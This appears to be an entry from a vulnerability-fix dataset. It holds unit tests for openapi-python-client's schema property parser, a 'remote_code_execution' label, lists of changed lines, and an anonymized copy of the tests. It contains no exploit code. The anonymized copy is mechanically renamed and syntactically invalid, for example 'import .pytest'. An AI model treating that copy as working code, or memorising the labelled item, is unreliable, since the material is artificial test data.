mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=oai.Schema(), detail=f"invalid data in items of array {name}")
def test_property_from_data_union(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
UnionProperty = mocker.patch(f"{MODULE_NAME}.UnionProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
IntProperty = mocker.patch(f"{MODULE_NAME}.IntProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=name, required=required, default="0.0")
IntProperty.assert_called_once_with(name=name, required=required, default="0")
UnionProperty.assert_called_once_with(
name=name,
required=required,
default=None,
inner_properties=[FloatProperty.return_value, IntProperty.return_value],
)
assert p == UnionProperty.return_value
def test_property_from_data_union_bad_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{}])
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(detail=f"Invalid property in union {name}", data=oai.Schema())
def test_property_from_data_unsupported_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=mocker.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
assert property_from_data(name=name, required=required, data=data) == PropertyError(
data=data, detail=f"unknown type {data.type}"
)
def test_property_from_data_no_valid_props_in_data(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
data = oai.Schema()
assert property_from_data(name="blah", required=True, data=data) == PropertyError(
data=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
def test_property_from_data_validation_error(self, mocker):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
mocker.patch(f"{MODULE_NAME}._property_from_data").side_effect = ValidationError()
data = oai.Schema()
assert property_from_data(name="blah", required=True, data=data) == PropertyError(
detail="Failed to validate default value", data=data
)
class TestStringBasedProperty:
def test__string_based_property_no_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string")
StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
assert p == StringProperty.return_value
# Test optional values
StringProperty.reset_mock()
data.default = mocker.MagicMock()
data.pattern = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)
def test__string_based_property_datetime_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="date-time")
DateTimeProperty = mocker.patch(f"{MODULE_NAME}.DateTimeProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
DateTimeProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == DateTimeProperty.return_value
# Test optional values
DateTimeProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
DateTimeProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_date_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="date")
DateProperty = mocker.patch(f"{MODULE_NAME}.DateProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
DateProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == DateProperty.return_value
# Test optional values
DateProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
DateProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_binary_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="binary")
FileProperty = mocker.patch(f"{MODULE_NAME}.FileProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
FileProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == FileProperty.return_value
# Test optional values
FileProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
FileProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_unsupported_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format=mocker.MagicMock())
StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
assert p == StringProperty.return_value
# Test optional values
StringProperty.reset_mock()
data.default = mocker.MagicMock()
data.pattern = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)
| remote_code_execution | {
"code": [
"from openapi_python_client.parser.errors import PropertyError",
"class TestStringProperty:",
" def test___post_init__(self):",
" from openapi_python_client.parser.properties import StringProperty",
" sp = StringProperty(name=\"test\", required=True, default=\"A Default Value\",)",
" assert sp.default == '\"A Default Value\"'",
" \"from datetime import datetime\",",
" \"from datetime import datetime\",",
" \"from datetime import date\",",
" \"from datetime import date\",",
"class TestDictProperty:",
" def test___post_init__(self):",
" from openapi_python_client.parser.properties import DictProperty",
" p = DictProperty(name=\"blah\", required=True, default={})",
" assert p.default == \"field(default_factory=lambda: cast(Dict[Any, Any], {}))\"",
" FloatProperty.assert_called_once_with(name=f\"{name}_item\", required=True, default=\"0.0\")"
],
"line_no": [
4,
47,
48,
49,
51,
53,
73,
80,
93,
100,
380,
381,
382,
384,
385,
509
]
} | {
"code": [
"from datetime import date, datetime",
"from openapi_python_client.parser.errors import PropertyError, ValidationError",
" def test___post_init(self, mocker):",
" from openapi_python_client.parser.properties import Property",
" validate_default = mocker.patch(f\"{MODULE_NAME}.Property._validate_default\")",
" Property(name=\"a name\", required=True, default=None)",
" Property(name=\"a name\", required=True, default=\"the default value\")",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import Property",
" with pytest.raises(ValidationError):",
" p._validate_default(\"a default value\")",
" with pytest.raises(ValidationError):",
" p = Property(name=\"a name\", required=True, default=\"\")",
"class TestStringProperty:",
" from openapi_python_client.parser.properties import StringProperty",
" p = StringProperty(name=\"a name\", required=True, default=\"the default value\")",
" assert p.default == '\"the default value\"'",
" \"import datetime\",",
" \"import datetime\",",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import DateTimeProperty",
" with pytest.raises(ValidationError):",
" p = DateTimeProperty(name=\"a name\", required=True, default=\"not a datetime\")",
" p = DateTimeProperty(name=\"a name\", required=True, default=\"2017-07-21T17:32:28Z\")",
" assert p.default == \"datetime.datetime(2017, 7, 21, 17, 32, 28, tzinfo=datetime.timezone.utc)\"",
" \"import datetime\",",
" \"import datetime\",",
" from openapi_python_client.parser.properties import DateProperty",
" p = DateProperty(name=\"a name\", required=True, default=\"not a date\")",
" p = DateProperty(name=\"a name\", required=True, default=\"1010-10-10\")",
" assert p.default == \"datetime.date(1010, 10, 10)\"",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import FileProperty",
" p = FileProperty(name=\"a name\", required=True, default=None)",
" with pytest.raises(ValidationError):",
"class TestFloatProperty:",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import FloatProperty",
" p = FloatProperty(name=\"a name\", required=True, default=\"123.123\")",
" assert p.default == 123.123",
" with pytest.raises(ValidationError):",
" p = FloatProperty(name=\"a name\", required=True, default=\"not a float\")",
"class TestIntProperty:",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import IntProperty",
" p = IntProperty(name=\"a name\", required=True, default=None)",
" p = IntProperty(name=\"a name\", required=True, default=\"123\")",
" assert p.default == 123",
" with pytest.raises(ValidationError):",
" p = IntProperty(name=\"a name\", required=True, default=\"not an int\")",
"class TestBooleanProperty:",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import BooleanProperty",
" p = BooleanProperty(name=\"a name\", required=True, default=None)",
" p = BooleanProperty(name=\"a name\", required=True, default=\"Literally anything will work\")",
" def test__validate_default(self, mocker):",
" inner_property = mocker.MagicMock()",
" inner_type_string = mocker.MagicMock()",
" inner_property._validate_default.return_value = \"y\"",
" p = ListProperty(name=\"a name\", required=True, default=[\"x\"], inner_property=inner_property)",
" with pytest.raises(ValidationError):",
" p = ListProperty(name=\"a name\", required=True, default=\"x\", inner_property=inner_property)",
" from openapi_python_client.parser.properties import ListProperty, RefProperty",
" inner_enum_property = mocker.MagicMock(spec=RefProperty)",
" inner_enum_property.get_type_string.return_value = \"AnEnum\"",
" p = ListProperty(name=\"a name\", required=True, default=[\"val1\"], inner_property=inner_enum_property)",
" assert p.default == f\"field(default_factory=lambda: cast(List[AnEnum], [AnEnum.val1]))\"",
" def test__validate_default(self, mocker):",
" from openapi_python_client.parser.properties import UnionProperty",
" inner_property_1.get_type_string.return_value = \"inner_type_string_1\"",
" inner_property_1._validate_default.side_effect = ValidationError()",
" inner_property_2 = mocker.MagicMock()",
" inner_property_2._validate_default.return_value = \"the default value\"",
" p = UnionProperty(",
" name=\"test\", required=True, default=\"a value\", inner_properties=[inner_property_1, inner_property_2]",
" assert p.default == \"the default value\"",
" with pytest.raises(ValidationError):",
" p = UnionProperty(",
" name=\"test\", required=True, default=\"a value\", inner_properties=[inner_property_1, inner_property_2]",
" def test__validate_default(self, mocker):",
" fake_reference = mocker.MagicMock(class_name=\"MyTestEnum\", module_name=\"my_test_enum\")",
" mocker.patch(f\"{MODULE_NAME}.Reference.from_ref\", return_value=fake_reference)",
" from openapi_python_client.parser import properties",
" enum_property = properties.EnumProperty(",
" name=\"test\", required=True, default=\"test\", values={\"TEST\": \"test\"}, title=\"a_title\"",
" )",
" assert enum_property.default == \"MyTestEnum.TEST\"",
" with pytest.raises(ValidationError):",
" enum_property = properties.EnumProperty(",
" name=\"test\", required=True, default=\"bad_val\", values={\"TEST\": \"test\"}, title=\"a_title\"",
" properties._existing_enums = {}",
" from openapi_python_client.parser.properties import RefProperty",
" with pytest.raises(ValidationError):",
" p = RefProperty(name=\"a name\", required=True, default=\"\", reference=mocker.MagicMock())",
" enum_property = mocker.MagicMock()",
" enum_property._validate_default.return_value = \"val1\"",
" mocker.patch(f\"{MODULE_NAME}.EnumProperty.get_enum\", return_value=enum_property)",
" p = RefProperty(name=\"a name\", required=True, default=\"\", reference=mocker.MagicMock())",
"class TestDictProperty:",
" def test__validate_default(self):",
" p = DictProperty(name=\"a name\", required=True, default={\"key\": \"value\"})",
" with pytest.raises(ValidationError):",
" p = DictProperty(name=\"a name\", required=True, default=\"not a dict\")",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" FloatProperty.assert_called_once_with(name=name, required=True, default=\"0.0\")",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" def test_property_from_data_validation_error(self, mocker):",
" from openapi_python_client.parser.errors import PropertyError",
" from openapi_python_client.parser.properties import property_from_data",
" mocker.patch(f\"{MODULE_NAME}._property_from_data\").side_effect = ValidationError()",
" data = oai.Schema()",
" assert property_from_data(name=\"blah\", required=True, data=data) == PropertyError(",
" detail=\"Failed to validate default value\", data=data",
" )"
],
"line_no": [
1,
6,
13,
14,
16,
18,
21,
60,
61,
66,
67,
69,
70,
73,
84,
86,
87,
98,
105,
109,
110,
112,
113,
115,
116,
127,
134,
139,
142,
144,
145,
165,
166,
169,
171,
175,
176,
177,
182,
183,
185,
186,
189,
190,
191,
194,
196,
197,
199,
200,
203,
204,
205,
208,
210,
259,
262,
263,
265,
267,
270,
271,
274,
276,
277,
280,
281,
327,
328,
331,
332,
333,
335,
336,
337,
340,
344,
345,
346,
467,
468,
469,
471,
473,
474,
475,
476,
478,
479,
480,
483,
535,
537,
538,
540,
541,
542,
543,
547,
573,
576,
578,
579,
588,
616,
631,
654,
678,
684,
705,
720,
740,
769,
770,
771,
773,
775,
776,
777,
778
]
} | import .pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError
VAR_0 = "openapi_python_client.parser.properties"
class CLASS_0:
def FUNC_0(self):
from openapi_python_client.parser.properties import Property
VAR_4 = Property(VAR_5="test", VAR_26=True, default=None)
VAR_4._type_string = "TestType"
assert VAR_4.get_type_string() == "TestType"
VAR_4.required = False
assert VAR_4.get_type_string() == "Optional[TestType]"
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_5 = VAR_1.MagicMock()
VAR_6 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = Property(VAR_5=name, VAR_26=True, default=None)
VAR_7 = VAR_1.patch.object(VAR_4, "get_type_string")
assert VAR_4.to_string() == f"{VAR_6(VAR_5)}: {VAR_7()}"
VAR_4.required = False
assert VAR_4.to_string() == f"{VAR_6(VAR_5)}: {VAR_7()} = None"
VAR_4.default = "TEST"
assert VAR_4.to_string() == f"{VAR_6(VAR_5)}: {VAR_7()} = TEST"
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = Property(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9="") == set()
VAR_4.required = False
assert VAR_4.get_imports(VAR_9="") == {"from typing import Optional"}
class CLASS_1:
def test___post_init__(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_8 = VAR_35(VAR_5="test", VAR_26=True, default="A Default Value",)
assert VAR_8.default == '"A Default Value"'
def FUNC_0(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_4 = VAR_35(VAR_5="test", VAR_26=True, default=None)
assert VAR_4.get_type_string() == "str"
VAR_4.required = False
assert VAR_4.get_type_string() == "Optional[str]"
class CLASS_2:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import .DateTimeProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = VAR_36(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9="") == {
"from datetime import datetime",
"from typing import cast",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9="") == {
"from typing import Optional",
"from datetime import datetime",
"from typing import cast",
}
class CLASS_3:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import .DateProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = VAR_37(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9="") == {
"from datetime import date",
"from typing import cast",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9="") == {
"from typing import Optional",
"from datetime import date",
"from typing import cast",
}
class CLASS_4:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import .FileProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = "blah"
VAR_4 = VAR_38(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9=prefix) == {f"from {VAR_9}.types import File", "from dataclasses import astuple"}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Optional",
f"from {VAR_9}.types import File",
"from dataclasses import astuple",
}
class CLASS_5:
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_11 = VAR_1.MagicMock()
VAR_10.get_type_string.return_value = VAR_11
VAR_4 = VAR_31(VAR_5="test", VAR_26=True, default=None, VAR_10=inner_property)
assert VAR_4.get_type_string() == f"List[{VAR_11}]"
VAR_4.required = False
assert VAR_4.get_type_string() == f"Optional[List[{VAR_11}]]"
VAR_4 = VAR_31(VAR_5="test", VAR_26=True, default=[], VAR_10=inner_property)
assert VAR_4.default == f"field(default_factory=lambda: cast(List[{VAR_11}], []))"
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_12 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_12}
VAR_9 = VAR_1.MagicMock()
VAR_4 = VAR_31(VAR_5="test", VAR_26=True, default=None, VAR_10=inner_property)
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
"from typing import Optional",
}
VAR_4.default = VAR_1.MagicMock()
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
class CLASS_6:
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_13 = VAR_1.MagicMock()
VAR_13.get_type_string.return_value = "inner_type_string_1"
VAR_14 = VAR_1.MagicMock()
VAR_14.get_type_string.return_value = "inner_type_string_2"
VAR_4 = VAR_33(
VAR_5="test", VAR_26=True, default=None, inner_properties=[VAR_13, VAR_14]
)
assert VAR_4.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
VAR_4.required = False
assert VAR_4.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_13 = VAR_1.MagicMock()
VAR_15 = VAR_1.MagicMock()
VAR_13.get_imports.return_value = {VAR_15}
VAR_14 = VAR_1.MagicMock()
VAR_16 = VAR_1.MagicMock()
VAR_14.get_imports.return_value = {VAR_16}
VAR_9 = VAR_1.MagicMock()
VAR_4 = VAR_33(
VAR_5="test", VAR_26=True, default=None, inner_properties=[VAR_13, VAR_14]
)
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_15,
VAR_16,
"from typing import Union",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_15,
VAR_16,
"from typing import Union",
"from typing import Optional",
}
class CLASS_7:
def test___post_init__(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_6 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_17 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_18 = VAR_1.MagicMock(class_name="Deduped")
VAR_19 = VAR_1.patch(
f"{VAR_0}.Reference.from_ref", side_effect=[VAR_17, VAR_18, deduped_reference]
)
from openapi_python_client.parser import .properties
VAR_20 = VAR_1.MagicMock()
properties._existing_enums = {"MyTestEnum": VAR_20}
VAR_21 = {"FIRST": "first", "SECOND": "second"}
VAR_22 = properties.EnumProperty(
VAR_5=name, VAR_26=True, default="second", VAR_21=values, title="a_title",
)
assert VAR_22.default == "Deduped.SECOND"
assert VAR_22.python_name == VAR_6(VAR_5)
VAR_19.assert_has_calls([VAR_1.call("a_title"), VAR_1.call("MyTestEnum1")])
assert VAR_22.reference == VAR_18
assert properties._existing_enums == {"MyTestEnum": VAR_20, "Deduped": VAR_22}
assert (
properties.EnumProperty(VAR_5=name, VAR_26=True, default="second", VAR_21=values, title="a_title",)
== VAR_22
)
assert properties._existing_enums == {"MyTestEnum": VAR_20, "Deduped": VAR_22}
VAR_20.values = VAR_21
VAR_19.reset_mock()
VAR_19.side_effect = [VAR_17]
VAR_22 = properties.EnumProperty(
VAR_5=name, VAR_26=True, default="second", VAR_21=values, title="a_title",
)
assert VAR_22.default == "MyTestEnum.SECOND"
assert VAR_22.python_name == VAR_6(VAR_5)
VAR_19.assert_called_once_with("a_title")
assert VAR_22.reference == VAR_17
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def FUNC_0(self, VAR_1):
VAR_17 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_17)
from openapi_python_client.parser import .properties
VAR_22 = properties.EnumProperty(VAR_5="test", VAR_26=True, default=None, VAR_21={}, title="a_title")
assert VAR_22.get_type_string() == "MyTestEnum"
VAR_22.required = False
assert VAR_22.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def FUNC_2(self, VAR_1):
VAR_17 = VAR_1.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_17)
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser import .properties
VAR_22 = properties.EnumProperty(VAR_5="test", VAR_26=True, default=None, VAR_21={}, title="a_title")
assert VAR_22.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}"
}
VAR_22.required = False
assert VAR_22.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def FUNC_4(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_23 = ["abc", "123", "a23", "1bc"]
VAR_24 = VAR_27.values_from_list(VAR_23)
assert VAR_24 == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def FUNC_5(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_23 = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
VAR_27.values_from_list(VAR_23)
def FUNC_6(self, VAR_1):
from openapi_python_client.parser import .properties
properties._existing_enums = VAR_1.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def FUNC_7(self):
from openapi_python_client.parser import .properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
class CLASS_8:
def FUNC_8(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_25 = VAR_28(
VAR_5="test", VAR_26=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_25.template == "ref_property.pyi"
VAR_1.patch(f"{VAR_0}.EnumProperty.get_enum", return_value="an enum")
assert VAR_25.template == "enum_property.pyi"
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_25 = VAR_28(
VAR_5="test", VAR_26=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_25.get_type_string() == "MyRefClass"
VAR_25.required = False
assert VAR_25.get_type_string() == "Optional[MyRefClass]"
def FUNC_2(self, VAR_1):
VAR_17 = VAR_1.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser.properties import .RefProperty
VAR_4 = VAR_28(VAR_5="test", VAR_26=True, default=None, reference=VAR_17)
assert VAR_4.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}",
"from typing import Dict",
"from typing import cast",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
class CLASS_9:
def test___post_init__(self):
from openapi_python_client.parser.properties import DictProperty
VAR_4 = DictProperty(VAR_5="blah", VAR_26=True, default={})
assert VAR_4.default == "field(default_factory=lambda: cast(Dict[Any, Any], {}))"
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import DictProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = VAR_1.MagicMock()
VAR_4 = DictProperty(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Dict",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
VAR_4.default = VAR_1.MagicMock()
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
class CLASS_10:
def FUNC_9(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = VAR_1.MagicMock(title=None)
VAR_27 = VAR_1.patch(f"{VAR_0}.EnumProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_27.values_from_list.assert_called_once_with(VAR_23.enum)
VAR_27.assert_called_once_with(
VAR_5=name, VAR_26=required, VAR_21=VAR_27.values_from_list(), default=VAR_23.default, title=VAR_5
)
assert VAR_4 == VAR_27()
VAR_27.reset_mock()
VAR_23.title = VAR_1.MagicMock()
property_from_data(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_27.assert_called_once_with(
VAR_5=name, VAR_26=required, VAR_21=VAR_27.values_from_list(), default=VAR_23.default, title=VAR_23.title
)
def FUNC_10(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Reference.construct(ref=VAR_1.MagicMock())
VAR_19 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
VAR_28 = VAR_1.patch(f"{VAR_0}.RefProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_19.assert_called_once_with(VAR_23.ref)
VAR_28.assert_called_once_with(VAR_5=name, VAR_26=required, reference=VAR_19(), default=None)
assert VAR_4 == VAR_28()
def FUNC_11(self, VAR_1):
VAR_29 = VAR_1.patch(f"{VAR_0}._string_based_property")
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == VAR_29.return_value
VAR_29.assert_called_once_with(VAR_5=name, VAR_26=required, VAR_23=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def FUNC_12(self, VAR_1, VAR_2, VAR_3):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type=VAR_2)
VAR_30 = VAR_1.patch(f"{VAR_0}.{VAR_3}")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_30.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_30()
VAR_30.reset_mock()
VAR_23.default = VAR_1.MagicMock()
property_from_data(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_30.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_13(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
VAR_31 = VAR_1.patch(f"{VAR_0}.ListProperty")
VAR_32 = VAR_1.patch(f"{VAR_0}.FloatProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_32.assert_called_once_with(VAR_5=f"{VAR_5}_item", VAR_26=True, default="0.0")
VAR_31.assert_called_once_with(
VAR_5=name, VAR_26=required, default=None, VAR_10=VAR_32.return_value
)
assert VAR_4 == VAR_31.return_value
def FUNC_14(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(type="array")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == PropertyError(VAR_23=data, detail="type array must have items defined")
def FUNC_15(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(type="array", items={},)
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == PropertyError(VAR_23=oai.Schema(), detail=f"invalid VAR_23 in items of array {VAR_5}")
def FUNC_16(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
VAR_33 = VAR_1.patch(f"{VAR_0}.UnionProperty")
VAR_32 = VAR_1.patch(f"{VAR_0}.FloatProperty")
VAR_34 = VAR_1.patch(f"{VAR_0}.IntProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_32.assert_called_once_with(VAR_5=name, VAR_26=required, default="0.0")
VAR_34.assert_called_once_with(VAR_5=name, VAR_26=required, default="0")
VAR_33.assert_called_once_with(
VAR_5=name,
VAR_26=required,
default=None,
inner_properties=[VAR_32.return_value, VAR_34.return_value],
)
assert VAR_4 == VAR_33.return_value
